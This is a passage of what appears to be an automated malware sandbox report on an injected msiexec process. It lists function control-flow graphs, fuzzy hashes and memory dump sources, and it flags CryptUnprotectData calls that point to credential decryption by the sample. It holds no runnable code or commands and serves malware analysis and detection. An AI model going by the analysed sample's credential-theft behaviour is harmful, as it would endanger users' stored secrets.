                                                                                                                                                                                    control_flow_graph 1254 307ca08-307ca38 1256 307ca3f-307cb1c call 30741a0 call 3073cc0 1254->1256 1257 307ca3a 1254->1257 1267 307cb23-307cb44 call 3075658 1256->1267 1268 307cb1e 1256->1268 1257->1256 1270 307cb49-307cb54 1267->1270 1268->1267 1271 307cb56 1270->1271 1272 307cb5b-307cb5f 1270->1272 1271->1272 1273 307cb64-307cb6b 1272->1273 1274 307cb61-307cb62 1272->1274 1276 307cb72-307cb80 1273->1276 1277 307cb6d 1273->1277 1275 307cb83-307cbc7 1274->1275 1281 307cc2d-307cc44 1275->1281 1276->1275 1277->1276 1283 307cc46-307cc6b 1281->1283 1284 307cbc9-307cbdf 1281->1284 1291 307cc83 1283->1291 1292 307cc6d-307cc82 1283->1292 1288 307cbe1-307cbed 1284->1288 1289 307cc09 1284->1289 1293 307cbf7-307cbfd 1288->1293 1294 307cbef-307cbf5 1288->1294 1290 307cc0f-307cc2c 1289->1290 1290->1281 1292->1291 1295 307cc07 1293->1295 1294->1295 1295->1290
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: 8c3a7d265ca86b2195a1e261ed506baad3ea32e4bee3c4b8d792a866d4c8b8c7
                                                                                                                                                                                    • Instruction ID: e7f2ac0a3354ee1537ac9906d4d6714246a4071b7359f1c34498e2aaeb7846a1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c3a7d265ca86b2195a1e261ed506baad3ea32e4bee3c4b8d792a866d4c8b8c7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1181B374E01218CFEB54DFAAD894A9DBBF2BF89300F14C069E818AB365DB349945CF54
                                                                                                                                                                                    Function 0307D278 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1343 307d278-307d2a8 1344 307d2af-307d38c call 30741a0 call 3073cc0 1343->1344 1345 307d2aa 1343->1345 1355 307d393-307d3b4 call 3075658 1344->1355 1356 307d38e 1344->1356 1345->1344 1358 307d3b9-307d3c4 1355->1358 1356->1355 1359 307d3c6 1358->1359 1360 307d3cb-307d3cf 1358->1360 1359->1360 1361 307d3d4-307d3db 1360->1361 1362 307d3d1-307d3d2 1360->1362 1364 307d3e2-307d3f0 1361->1364 1365 307d3dd 1361->1365 1363 307d3f3-307d437 1362->1363 1369 307d49d-307d4b4 1363->1369 1364->1363 1365->1364 1371 307d4b6-307d4db 1369->1371 1372 307d439-307d44f 1369->1372 1379 307d4f3 1371->1379 1380 307d4dd-307d4f2 1371->1380 1376 307d451-307d45d 1372->1376 1377 307d479 1372->1377 1381 307d467-307d46d 1376->1381 1382 307d45f-307d465 1376->1382 1378 307d47f-307d49c 1377->1378 1378->1369 1380->1379 1383 307d477 1381->1383 1382->1383 1383->1378
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: 809074203c85f6e709b8b997648f202fae6327ea0aa4520d10d342447f6d11db
                                                                                                                                                                                    • Instruction ID: 9f1f04fdf968ec3eb49c11106550d0e31ff640d9b55d1f6b5c42286a1fab2269
                                                                                                                                                                                    • Opcode Fuzzy Hash: 809074203c85f6e709b8b997648f202fae6327ea0aa4520d10d342447f6d11db
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3481C374E01218CFDB54DFAAD884A9DFBF2BF89300F148069E808AB365DB349945CF54
                                                                                                                                                                                    Function 0307CCD8 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1299 307ccd8-307cd08 1300 307cd0f-307cdec call 30741a0 call 3073cc0 1299->1300 1301 307cd0a 1299->1301 1311 307cdf3-307ce14 call 3075658 1300->1311 1312 307cdee 1300->1312 1301->1300 1314 307ce19-307ce24 1311->1314 1312->1311 1315 307ce26 1314->1315 1316 307ce2b-307ce2f 1314->1316 1315->1316 1317 307ce34-307ce3b 1316->1317 1318 307ce31-307ce32 1316->1318 1320 307ce42-307ce50 1317->1320 1321 307ce3d 1317->1321 1319 307ce53-307ce97 1318->1319 1325 307cefd-307cf14 1319->1325 1320->1319 1321->1320 1327 307cf16-307cf3b 1325->1327 1328 307ce99-307ceaf 1325->1328 1334 307cf53 1327->1334 1335 307cf3d-307cf52 1327->1335 1332 307ceb1-307cebd 1328->1332 1333 307ced9 1328->1333 1336 307cec7-307cecd 1332->1336 1337 307cebf-307cec5 1332->1337 1338 307cedf-307cefc 1333->1338 1335->1334 1339 307ced7 1336->1339 1337->1339 1338->1325 1339->1338
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: 919e4f83f014600cb53fde3d6a1b061c3093e4c5dfa01803efb540383afdbea2
                                                                                                                                                                                    • Instruction ID: f9b7acd93c3dfcf6c9b1385cf99910a73422761ae48cb119f5fb77e8eed3e68d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 919e4f83f014600cb53fde3d6a1b061c3093e4c5dfa01803efb540383afdbea2
                                                                                                                                                                                    • Instruction Fuzzy Hash: CE81C574E01208CFEB54DFAAD984A9DBBF2BF89300F14C069E419AB365DB349945CF54
                                                                                                                                                                                    Function 0307CFAC Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1387 307cfac-307cfd8 1388 307cfdf-307d0bc call 30741a0 call 3073cc0 1387->1388 1389 307cfda 1387->1389 1399 307d0c3-307d0e4 call 3075658 1388->1399 1400 307d0be 1388->1400 1389->1388 1402 307d0e9-307d0f4 1399->1402 1400->1399 1403 307d0f6 1402->1403 1404 307d0fb-307d0ff 1402->1404 1403->1404 1405 307d104-307d10b 1404->1405 1406 307d101-307d102 1404->1406 1408 307d112-307d120 1405->1408 1409 307d10d 1405->1409 1407 307d123-307d167 1406->1407 1413 307d1cd-307d1e4 1407->1413 1408->1407 1409->1408 1415 307d1e6-307d20b 1413->1415 1416 307d169-307d17f 1413->1416 1422 307d223 1415->1422 1423 307d20d-307d222 1415->1423 1419 307d181-307d18d 1416->1419 1420 307d1a9 1416->1420 1424 307d197-307d19d 1419->1424 1425 307d18f-307d195 1419->1425 1426 307d1af-307d1cc 1420->1426 1423->1422 1427 307d1a7 1424->1427 1425->1427 1426->1413 1427->1426
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: c93fbcc9e5d98e4d6961fbc3a637493ef5b4e56a90d1748d218ba4b03ea6d172
                                                                                                                                                                                    • Instruction ID: 902a4db1eda29c75b6e55eb71f62e06b50f9e58bdfef4f4d94f0a861049f81b1
                                                                                                                                                                                    • Opcode Fuzzy Hash: c93fbcc9e5d98e4d6961fbc3a637493ef5b4e56a90d1748d218ba4b03ea6d172
                                                                                                                                                                                    • Instruction Fuzzy Hash: E181D374E01208DFDB54DFAAD984A9DBBF2BF88300F14C069E809AB365DB349985CF54
                                                                                                                                                                                    Function 0307C738 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1431 307c738-307c768 1432 307c76f-307c84c call 30741a0 call 3073cc0 1431->1432 1433 307c76a 1431->1433 1443 307c853-307c874 call 3075658 1432->1443 1444 307c84e 1432->1444 1433->1432 1446 307c879-307c884 1443->1446 1444->1443 1447 307c886 1446->1447 1448 307c88b-307c88f 1446->1448 1447->1448 1449 307c894-307c89b 1448->1449 1450 307c891-307c892 1448->1450 1451 307c8a2-307c8b0 1449->1451 1452 307c89d 1449->1452 1453 307c8b3-307c8f7 1450->1453 1451->1453 1452->1451 1457 307c95d-307c974 1453->1457 1459 307c976-307c99b 1457->1459 1460 307c8f9-307c90f 1457->1460 1467 307c9b3 1459->1467 1468 307c99d-307c9b2 1459->1468 1464 307c911-307c91d 1460->1464 1465 307c939 1460->1465 1469 307c927-307c92d 1464->1469 1470 307c91f-307c925 1464->1470 1466 307c93f-307c95c 1465->1466 1466->1457 1468->1467 1471 307c937 1469->1471 1470->1471 1471->1466
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2922459148.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_3070000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                                                    • Opcode ID: e727c61426106774a18a5cc877d12db337e1f64d11ef544298041d8669b6d12f
                                                                                                                                                                                    • Instruction ID: bd4ddd02bd9af5edd12fbed07c679675066a6645315e643275f4f1391f1a0eb6
                                                                                                                                                                                    • Opcode Fuzzy Hash: e727c61426106774a18a5cc877d12db337e1f64d11ef544298041d8669b6d12f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C81D474E01218CFEB54DFAAD984A9DBBF2BF88300F14C069E818AB365DB349945CF54
                                                                                                                                                                                    Function 240187A8 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 24018F5D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                                                                    • Opcode ID: 889803362ddbfcd0035d090f7a6a6979fe22fe5c0f73cb96a73fe2dd5a9080b7
                                                                                                                                                                                    • Instruction ID: 98f262e31dabb746b8596e13ec55dff51ceeb9af3f45303e3a93b9203729a995
                                                                                                                                                                                    • Opcode Fuzzy Hash: 889803362ddbfcd0035d090f7a6a6979fe22fe5c0f73cb96a73fe2dd5a9080b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: DB1179B6800219DFDB10DF99C844BDEBFF5EF48320F108419EA18A7210C375A690DFA5
                                                                                                                                                                                    Function 24018EF1 Relevance: 1.6, APIs: 1, Instructions: 53encryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 24018F5D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                                                                    • Opcode ID: 77161f9da0b4afac6dd05d6a9c24dcc3515cb1212c3b65183e2de2ee340d21ee
                                                                                                                                                                                    • Instruction ID: 9a0c59e13407694398b560f352295a9166c3b54472d8fa4bb5846dfaa788c4d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 77161f9da0b4afac6dd05d6a9c24dcc3515cb1212c3b65183e2de2ee340d21ee
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD117976800249DFCB10CF99C845BEEBFF5EF48320F14841AE558A7210C375A590DFA5
                                                                                                                                                                                    Function 21A51E70 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                    • API String ID: 0-2657877971
                                                                                                                                                                                    • Opcode ID: 8b1c0e8358f8d0b17366dba2fd820a399675b4ea7589cb5bd0409ee290e8198a
                                                                                                                                                                                    • Instruction ID: ac144f55e709a5c2443a087492c4e393ab8e1d327c0d457e55fd6bf87d6bb888
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b1c0e8358f8d0b17366dba2fd820a399675b4ea7589cb5bd0409ee290e8198a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C4178B1E016198BEB58CF6BC94479EFAF3BFC9304F14C1AAC50CA6254EB740A858F51
                                                                                                                                                                                    Function 21A50B30 Relevance: .7, Instructions: 709COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1805a7fd2fdad86fc7c40af9ae41515550fc7db8f678aef3dc54dfa1b5d553de
                                                                                                                                                                                    • Instruction ID: bb5cb6f130ee6df9596744a373fbb29d9e19997eb138d3a12114e577210f6705
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1805a7fd2fdad86fc7c40af9ae41515550fc7db8f678aef3dc54dfa1b5d553de
                                                                                                                                                                                    • Instruction Fuzzy Hash: AA72DF74E052298FDB64CF29C990BEDBBB2BB49304F1495E9D408A7355EB34AE85CF40
                                                                                                                                                                                    Function 21A59328 Relevance: .5, Instructions: 530COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a81c90228e9661dfdc34e00001dc745d104ba193d8c7ba2aa78a8a5aec354330
                                                                                                                                                                                    • Instruction ID: afacc6c18f0096fcdcebc559261861ac7c3f1b113f0b23df6642ba9b473f7967
                                                                                                                                                                                    • Opcode Fuzzy Hash: a81c90228e9661dfdc34e00001dc745d104ba193d8c7ba2aa78a8a5aec354330
                                                                                                                                                                                    • Instruction Fuzzy Hash: 55226874E04219DFDB54DFA9C984B9DBBB2BF88304F1085A9E408AB356DB349D86CF50
                                                                                                                                                                                    Function 24017B78 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 49c8989adbe6fb795f53e796263203a1ee6aa838c8e240ca21498ec6ae6879bf
                                                                                                                                                                                    • Instruction ID: 02ff4b704298f005dde0c72e5978f47972efd7d8cda2d1657ac835096003b014
                                                                                                                                                                                    • Opcode Fuzzy Hash: 49c8989adbe6fb795f53e796263203a1ee6aa838c8e240ca21498ec6ae6879bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 26E1B274E01218CFDB64CFA5C994B9DBBF2BF89304F2081A9D409A7355DB359A85CF14
                                                                                                                                                                                    Function 2401B7A8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7ab54b9a15c7bce405ce1915790a8aab83282d657fb179298ee0330c9d6a1e37
                                                                                                                                                                                    • Instruction ID: 25cce685ff4a30657fbe08a39c00105229c7236098419432e6aa430f4da3fce8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ab54b9a15c7bce405ce1915790a8aab83282d657fb179298ee0330c9d6a1e37
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01D19178E00218DFDB54DFA9C990B9DBBB2BF89300F1085A9D809BB359DB359985CF11
                                                                                                                                                                                    Function 24018FB0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939029917.0000000024010000.00000040.00000800.00020000.00000000.sdmp, Offset: 24010000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_24010000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b4f347b4e9c9ff2970e61abe9d24853acf437ff358aaf8af6a0a8216be22b34d
                                                                                                                                                                                    • Instruction ID: 475906e877696b4f15bbd7cf45b8e30cc62885db2cf98e6402be20966cfa4d6e
                                                                                                                                                                                    • Opcode Fuzzy Hash: b4f347b4e9c9ff2970e61abe9d24853acf437ff358aaf8af6a0a8216be22b34d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 87D19078E00218DFDB54DFA5C994B9DBBB2BF89300F1085A9D809AB358DB359986CF11
                                                                                                                                                                                    Function 21A52968 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7c96c7d690c6636dc09c40a3b58dda7ec7ce0e44afa6fc1d5c7ae6fee950f57d
                                                                                                                                                                                    • Instruction ID: e6cb99bec73f9f1213f434116ce43634831dff80f71667a52c8e022852802e7c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c96c7d690c6636dc09c40a3b58dda7ec7ce0e44afa6fc1d5c7ae6fee950f57d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 85C1A278E05218CFDB54DFA5C994B9DBBB2FF89304F1080AAD809AB355DB359A85CF10
                                                                                                                                                                                    Function 21A52DB8 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 36d52d0615b75fbbfac6f1f83042cd69c055ab792b69b8795a4e5521966485fa
                                                                                                                                                                                    • Instruction ID: 036ab143e7beb90b36f4b01cbd23ae58733dec8afd929a4ec9d6051d074a2464
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36d52d0615b75fbbfac6f1f83042cd69c055ab792b69b8795a4e5521966485fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 22A10674D00208CFEB14DFA9C984BDDBBB1FF89314F209269E509AB291DB749985CF54
                                                                                                                                                                                    Function 21A52DC8 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 3bab5134b9a0d310b6619c0b8ff5867bcbc0ca3257b29a2469810f10e55029b7
                                                                                                                                                                                    • Instruction ID: d83450ae22d2bdf8371dff6453dfc45981a9ec47be2949fb2bb6fc0d227db9b5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bab5134b9a0d310b6619c0b8ff5867bcbc0ca3257b29a2469810f10e55029b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20A1F574D00208CFEB14DFA9C984BDDBBB1FF89314F209269E508AB2A1DB749985CF54
                                                                                                                                                                                    Function 21A51E80 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 44ef2cfeed55ca879412321035986b006035b956ff5160f2fc195d0438aa646b
                                                                                                                                                                                    • Instruction ID: cd45601e8723c6aeb3753e6a247c2bc20d3dab452f4b2bd3ace9313120c9854e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 44ef2cfeed55ca879412321035986b006035b956ff5160f2fc195d0438aa646b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 92A1A2B4E05219CFEB64CF6AC944B9DFAF2BF89300F14C1AAD508A7254DB345A85CF51
                                                                                                                                                                                    Function 21A517A0 Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: df83ee9f6a2a26d8ee1276846d15b84abf7f1f6280736ecbdc825ae8128491e7
                                                                                                                                                                                    • Instruction ID: a00522bd79bdac806125dd656c3900f55194b2c508b942edbc3e387f369cc4e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: df83ee9f6a2a26d8ee1276846d15b84abf7f1f6280736ecbdc825ae8128491e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 27A1A2B4E05219CFEB64CF6AC984B9DBBF2BF89300F14C1A9D508A7254EB345A85CF51
                                                                                                                                                                                    Function 21A5310E Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b9f87fecd7bb41db4fcebc6f5224d6b143941556aba774bbe2482d5e230843d6
                                                                                                                                                                                    • Instruction ID: 76323216c0cd9e65070bc36e56351efc5aaad98817e745ba787cd3bb1f108278
                                                                                                                                                                                    • Opcode Fuzzy Hash: b9f87fecd7bb41db4fcebc6f5224d6b143941556aba774bbe2482d5e230843d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C911374E04208DFEB50DFA9C984BDDBBB1FF89310F209269E509AB291DB749985CF14
                                                                                                                                                                                    Function 21A5FC68 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 9c2f289dc7eba53df74276536f1a1bb998ac723211291cd960cf9322fd5d7ede
                                                                                                                                                                                    • Instruction ID: c2b101300cd8d2fa22f2b5568d6874c1216166106b015644867d30a917513f2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c2f289dc7eba53df74276536f1a1bb998ac723211291cd960cf9322fd5d7ede
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B81E274E00219DFDB54DFA9C990A9DBBB2FF89300F208429D804BB358EB399946CF54
                                                                                                                                                                                    Function 21A50B20 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2936422899.0000000021A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 21A50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_21a50000_msiexec.jbxd
                                                                                                                                                                                    Similarity
